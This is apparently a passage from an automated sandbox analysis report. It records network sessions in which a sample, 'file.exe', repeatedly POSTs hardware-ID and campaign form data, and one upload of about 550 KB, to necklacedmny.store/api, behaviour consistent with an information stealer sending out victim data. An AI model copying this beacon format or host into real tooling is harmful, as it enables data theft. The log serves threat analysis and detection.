                                                                                Data Ascii: 4CaeHKiL2uEtKKA/ogBT/HPe2hwSWXPvBmuhn3EaDv6xG4MQiO7/sBnkmGvmFUsQA9KaKCJ8W546JoWfYAdjt6gepwDV67qAiez0R6MNJgBO0p4BJwlzghYysZ9wA3vmnSObGLTWy6wJ6LhL9jlLcAP+vgACWEaTBw694kF6bzqdH58A7eqmuEjwoE7jbFs8G+6ODCpkd7p2RpGnYA9f0pE/7wSIzteMCeycT8oBRjkS0p5RJwlzHmJOlIM9Iwr
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 77 43 73 30 70 4f 55 4e 63 79 41 57 38 59 64 65 7a 51 72 77 70 49 73 4d 6d 52 44 76 69 49 43 6e 5a 4e 6b 49 30 76 44 71 42 36 6e 41 4e 58 72 75 6f 43 70 6e 4c 42 50 31 77 30 6d 41 45 37 53 6e 67 45 6e 43 58 4f 69 42 68 71 68 71 31 67 4c 65 2b 61 42 4d 36 63 77 75 4e 62 4c 6d 44 33 4d 76 46 50 47 43 55 4d 73 41 2f 36 61 42 43 70 77 61 70 4d 48 44 72 33 69 51 58 70 76 66 73 55 54 6c 77 47 30 6c 2b 50 6c 4c 65 79 4e 66 6f 4d 4e 64 77 67 37 7a 6f 49 45 4b 6b 68 6e 67 68 59 61 6f 61 4d 49 4f 32 2f 69 34 57 2b 6e 4f 4b 44 61 31 34 41 39 36 4a 68 6e 37 68 78 61 41 53 76 4f 34 7a 46 48 61 4d 65 69 49 71 71 39 37 6b 42 6d 56 35 75 70 4f 35 59 64 31 65 72 66 72 41 58 4d 69 48 50 36 41 58 63 73 41 39 61 65 45 42 49 67 66 36 34 43 48 71 47 2f 57 41 4e 72 77 72 45 37
                                                                                Data Ascii: wCs0pOUNcyAW8YdezQrwpIsMmRDviICnZNkI0vDqB6nANXruoCpnLBP1w0mAE7SngEnCXOiBhqhq1gLe+aBM6cwuNbLmD3MvFPGCUMsA/6aBCpwapMHDr3iQXpvfsUTlwG0l+PlLeyNfoMNdwg7zoIEKkhnghYaoaMIO2/i4W+nOKDa14A96Jhn7hxaASvO4zFHaMeiIqq97kBmV5upO5Yd1erfrAXMiHP6AXcsA9aeEBIgf64CHqG/WANrwrE7
                                                                                2024-10-29 14:27:18 UTC373INData Raw: 4c 57 6e 4e 55 49 49 43 66 4b 45 52 73 6b 64 2b 2b 44 43 53 5a 56 63 76 4c 62 44 6f 57 66 4c 46 38 33 79 75 6b 36 70 2b 47 4e 36 72 71 42 54 50 42 6f 63 39 6f 31 52 32 42 75 35 68 35 6f 44 6e 51 7a 6a 6d 49 7a 6f 4c 70 41 41 6d 36 66 35 42 36 6e 44 50 48 72 75 73 46 6b 6e 65 6b 79 76 30 77 54 52 52 4f 33 67 6d 6b 6e 43 54 71 72 50 6b 65 67 34 6b 45 48 59 37 62 68 50 36 74 45 75 66 59 6a 65 4c 47 59 69 47 65 2b 53 61 50 41 4e 37 71 32 4b 48 6f 74 51 38 59 79 4e 70 6d 66 47 52 70 57 2f 70 51 6d 78 2f 6d 31 79 39 74 39 46 50 44 64 66 6f 4d 4e 6a 7a 51 54 36 70 35 6f 59 31 7a 76 2b 67 6f 57 2f 63 5a 42 49 6d 2f 6e 71 45 62 6d 4a 62 54 36 6e 6f 46 4d 73 66 55 53 74 30 41 47 65 57 4f 76 75 6c 55 6d 4d 58 4c 7a 64 7a 65 68 79 6b 46 36 62 75 4b 6c 62 2b 38 45 75
                                                                                Data Ascii: LWnNUIICfKERskd++DCSZVcvLbDoWfLF83yuk6p+GN6rqBTPBoc9o1R2Bu5h5oDnQzjmIzoLpAAm6f5B6nDPHrusFknekyv0wTRRO3gmknCTqrPkeg4kEHY7bhP6tEufYjeLGYiGe+SaPAN7q2KHotQ8YyNpmfGRpW/pQmx/m1y9t9FPDdfoMNjzQT6p5oY1zv+goW/cZBIm/nqEbmJbT6noFMsfUSt0AGeWOvulUmMXLzdzehykF6buKlb+8Eu
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 32 32 32 33 0d 0a 6c 77 58 4a 37 61 78 4b 2f 38 52 71 42 49 6a 6a 48 58 45 67 46 50 6d 39 61 4f 41 48 39 61 4f 43 53 36 73 4b 36 5a 2b 41 72 57 66 75 4f 4e 58 34 76 6b 37 6e 77 53 31 36 2b 4b 41 45 50 48 63 6d 75 4d 73 57 38 55 53 30 75 4d 78 52 32 69 6e 6e 67 59 32 76 64 73 46 4c 2b 4f 6d 6e 52 75 4c 47 62 58 54 32 35 6b 73 6b 66 31 47 34 68 30 65 4f 55 71 54 79 31 31 7a 4a 53 37 54 64 6e 4f 5a 35 6b 42 43 62 70 2f 67 48 71 64 56 74 59 76 61 6e 42 58 45 75 48 50 61 41 52 4e 77 4d 39 37 61 50 54 71 51 69 78 59 4b 49 70 47 33 66 44 65 58 42 69 30 54 69 79 79 41 31 76 64 34 31 61 53 77 52 39 6f 52 41 33 30 71 36 34 49 4e 4a 77 69 57 6b 78 38 4f 58 4c 70 41 65 6d 36 66 71 66 4f 72 4a 49 7a 32 67 38 55 5a 64 49 68 54 30 6a 6c 6e 46 53 72 72 67 69 6b 6e 43 54
                                                                                Data Ascii: 2223lwXJ7axK/8RqBIjjHXEgFPm9aOAH9aOCS6sK6Z+ArWfuONX4vk7nwS16+KAEPHcmuMsW8US0uMxR2inngY2vdsFL+OmnRuLGbXT25kskf1G4h0eOUqTy11zJS7TdnOZ5kBCbp/gHqdVtYvanBXEuHPaARNwM97aPTqQixYKIpG3fDeXBi0TiyyA1vd41aSwR9oRA30q64INJwiWkx8OXLpAem6fqfOrJIz2g8UZdIhT0jlnFSrrgiknCT
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 57 52 63 63 46 79 2f 6d 70 64 39 66 73 49 54 79 78 2b 67 78 36 43 54 2b 34 7a 52 62 42 53 71 79 5a 7a 45 48 61 49 36 72 50 6d 2b 67 34 6b 44 50 59 38 61 52 4f 2f 39 5a 67 48 36 48 6a 47 33 6f 73 58 37 62 44 55 49 35 53 70 4f 37 4d 44 59 74 63 76 4e 2f 52 38 7a 57 44 55 59 75 74 74 51 66 77 68 7a 74 36 37 72 4a 46 50 44 31 66 6f 4d 4d 52 7a 52 6a 6d 70 6f 38 66 6d 56 76 61 73 61 57 72 63 64 6f 6e 31 75 2b 74 64 39 66 53 4c 6a 53 34 35 78 31 74 62 31 47 34 6a 42 61 57 4d 37 54 6f 77 41 2b 5a 43 71 53 77 7a 65 68 34 6b 46 36 62 79 71 6c 48 35 38 41 37 4b 2f 76 47 43 47 30 6c 50 76 57 54 55 59 35 45 74 4b 62 4d 55 63 6c 53 70 49 75 53 36 44 69 41 56 49 43 71 2b 52 36 35 6c 54 4a 30 72 36 41 64 50 48 64 4e 74 73 4e 45 6a 6c 4b 30 35 34 38 62 69 42 72 6e 6d 59
                                                                                Data Ascii: WRccFy/mpd9fsITyx+gx6CT+4zRbBSqyZzEHaI6rPm+g4kDPY8aRO/9ZgH6HjG3osX7bDUI5SpO7MDYtcvN/R8zWDUYuttQfwhzt67rJFPD1foMMRzRjmpo8fmVvasaWrcdon1u+td9fSLjS45x1tb1G4jBaWM7TowA+ZCqSwzeh4kF6byqlH58A7K/vGCG0lPvWTUY5EtKbMUclSpIuS6DiAVICq+R65lTJ0r6AdPHdNtsNEjlK0548biBrnmY


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.749721188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:27:18 UTC284OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 12849
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:27:18 UTC12849OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                2024-10-29 14:28:05 UTC1023INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:28:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=iint6jrdrdsqk7b3u1kg6dt4mb; expires=Sat, 22 Feb 2025 08:13:58 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVr8kZQ%2FMtMmGMJFZjmF5jIAX74ssXe4Kr%2B4epRyIOGsq3SJgett9qEZcaSuRzYglvLE%2BWRmX0jm2%2FyzVyLfggyNr1XN%2FRTWDf6eOcaARtOZECOcroAEYJRPMb9p82LnhfX%2FE8o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d87ac9e60bbe-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1597&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13791&delivery_rate=1776687&cwnd=32&unsent_bytes=0&cid=bbb06a1b25e0ac5e&ts=47121&x=0"
                                                                                2024-10-29 14:28:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                2024-10-29 14:28:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.749970188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:28:06 UTC284OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 15081
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:06 UTC15081OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                2024-10-29 14:28:07 UTC1019INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:28:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=9o9bflo6jcn6drmjvto091o62h; expires=Sat, 22 Feb 2025 08:14:45 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LGbs4y8YYaI7EtWbmTRVVqu2T4z43XB2ZBPhWxJEthycxgQQXjLcR1dddzMbtItVMGW1SXukdRAdR8D92b2FD66GEatsZctI%2BtfBSoRx8M%2BAf4W8upO%2Fcuhpg0QOo6OCGFa%2BoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d9a5ea60486b-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1941&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16023&delivery_rate=1638009&cwnd=237&unsent_bytes=0&cid=63b433071ec5ad6a&ts=629&x=0"
                                                                                2024-10-29 14:28:07 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                2024-10-29 14:28:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.749977188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:28:08 UTC284OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 20406
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                2024-10-29 14:28:08 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d
                                                                                Data Ascii: (X6K~`iO\_,mi`m?ls}Qm
                                                                                2024-10-29 14:28:09 UTC1015INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:28:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=dn6tpsp8nkvkfjsa8rvb0o59f9; expires=Sat, 22 Feb 2025 08:14:47 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5n1OmLNChoXrmyvEBWlAksNY4miZW1OnQ1gJp%2FhaLf8vBeaZ39wt3xp0N4PIYwxWhmPryuFrgTXiy0ajsx7diFPKMtEFbkAdtInn%2FVsW87GlrHD3JX0N2kapDsDRXYO9wgtaJQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d9b09a807d5d-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1289&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21370&delivery_rate=1548663&cwnd=252&unsent_bytes=0&cid=5800e0facf834bb6&ts=752&x=0"
                                                                                2024-10-29 14:28:09 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                2024-10-29 14:28:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.749979188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:28:10 UTC283OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1213
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:10 UTC1213OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.749980188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:28:15 UTC285OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 550975
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: f6 fa 49 6f 37 4d 9f 5b b3 5d d5 18 89 dd 68 08 df 73 da 04 0b cf e0 cb e8 a9 4b fc cb a5 90 b4 ca e7 ff 5a 73 5a 18 55 42 f1 ee 19 b7 15 7e 9f 98 ab 1f 12 4f 57 1c 8c 0a 4b c6 ee 28 2f 8b a6 4a 7c 0e 2a 36 37 e6 bc ad 3a 1e ab b9 a7 eb 12 dc 97 1b ab ae b6 8f ff ce e2 55 9a d6 c4 da b5 51 5c 0f 69 45 39 6e 7e c7 41 5a 6c 6c 15 7e 81 ad c6 06 ed 86 df 47 57 d4 85 c0 6d 21 f6 45 f2 20 11 5d f7 0c d0 1b 8c d1 60 5a 50 a3 89 b4 2e cf 8a 20 a0 7f 92 3d 42 c5 c8 95 0a f4 6e 0c 4f 0d 0f 56 3f 11 5f 30 e1 0e fa 36 60 2b 03 7e d8 71 bf 9d cc 1f fa 67 76 44 4e 0a 14 9c 8e 70 ed 53 63 87 0a 03 ce a1 85 c3 e6 80 cd f2 21 71 a4 c8 17 8b bc 0b 32 67 cb 31 a3 6f c4 87 8f f5 7c 15 82 7b bd ae e5 bd 7f fa d1 f1 c2 ad 95 67 e5 e7 bd cf 9a 08 86 4a 5e bf bf a0 a8 f8 22 e4
                                                                                Data Ascii: Io7M[]hsKZsZUB~OWK(/J|*67:UQ\iE9n~AZll~GWm!E ]`ZP. =BnOV?_06`+~qgvDNpSc!q2g1o|{gJ^"
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: e6 89 89 d4 80 4a de aa e8 cd 0c fc 73 3c 56 9a 5f a2 ff 74 5e ee 10 a4 25 da 3a 73 47 c5 5c 59 57 cb 21 c5 24 e2 a6 fe e5 97 dc a9 35 03 17 ad e4 4a 0b 5b 3c 6c 69 43 03 31 42 04 d4 e0 27 65 cb 78 0b 0b f2 93 37 1a 92 9f 6e d3 58 b2 65 ac 06 87 b3 96 0d 83 94 59 42 59 e9 16 51 e2 76 99 9a fe d1 a8 51 42 57 55 d4 f4 1c a5 91 da 48 c1 93 5c 50 47 6a e3 74 8d a3 e3 8b 8f 27 ee 35 2d da b9 3d e6 36 88 7e 27 b0 2e 15 72 42 1d 6e f6 83 be e8 a7 a4 f4 c6 f8 3b 8c 1b 46 a6 63 fd 06 3f 84 12 f8 bc f4 4c 5f 89 ff 98 c4 f9 06 85 64 5b 8b 43 69 c4 d4 d3 e6 75 d1 bd 61 5a 2e e4 a1 f0 af 82 0f 9e ac 9f d6 ad aa c9 7e ab d8 fb 23 66 82 8e 90 a8 ad da 1f 46 26 79 37 b6 1e 8c 2a 34 06 6f 41 82 8e 69 a6 81 59 75 51 60 bd fc a8 4a 66 11 47 47 73 20 c5 77 30 ba f8 b6 7a d6
                                                                                Data Ascii: Js<V_t^%:sG\YW!$5J[<liC1B'ex7nXeYBYQvQBWUH\PGjt'5-=6~'.rBn;Fc?L_d[CiuaZ.~#fF&y7*4oAiYuQ`JfGGs w0z
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: fd 50 2e cf 65 6e c3 8b f9 f8 b1 7e 2e 8a 20 48 eb ad 19 6d 21 62 e1 b3 cb f7 28 6c b4 16 57 3b 1a 59 75 79 dd 26 13 af 7f 63 a3 a8 e4 07 9f a4 42 a0 5e 5a 44 ac 95 45 5f 72 55 e8 bd 1a 27 65 d6 76 7a aa 78 77 c5 d4 bf c4 94 84 61 27 23 1e ae 55 9b ef e4 3e 54 ee 32 ef 71 83 9c 13 a0 72 e7 2b 0d 75 f3 c9 3d 38 50 f0 b1 2e 06 7f 9b 5e 28 63 ac 97 d5 8e e2 3a 80 e2 a2 53 e4 59 1a d5 be bc 19 5c 89 b1 34 de a9 19 9f fb 2d b7 02 1c b8 77 7e 04 07 80 e4 72 30 97 56 d8 8b 4b 4d 42 69 40 71 c7 2a b3 52 85 29 3e d0 db f4 f4 c0 04 96 7b 89 58 14 3d aa bd 7d 2f 88 21 56 73 9f 05 9b ee 3e 3a 17 5f 11 44 06 c1 f6 d5 f7 c8 65 0f 69 fe 29 eb 41 17 a6 b6 49 0d 8f 3e 77 7b 8f 38 32 ed ef ee 91 12 47 36 f2 f3 ee c7 b1 70 ed 6b ba b6 7a c1 f7 cd db 2d 43 c7 1e d4 6c b6 8f
                                                                                Data Ascii: P.en~. Hm!b(lW;Yuy&cB^ZDE_rU'evzxwa'#U>T2qr+u=8P.^(c:SY\4-w~r0VKMBi@q*R)>{X=}/!Vs>:_Dei)AI>w{82G6pkz-Cl
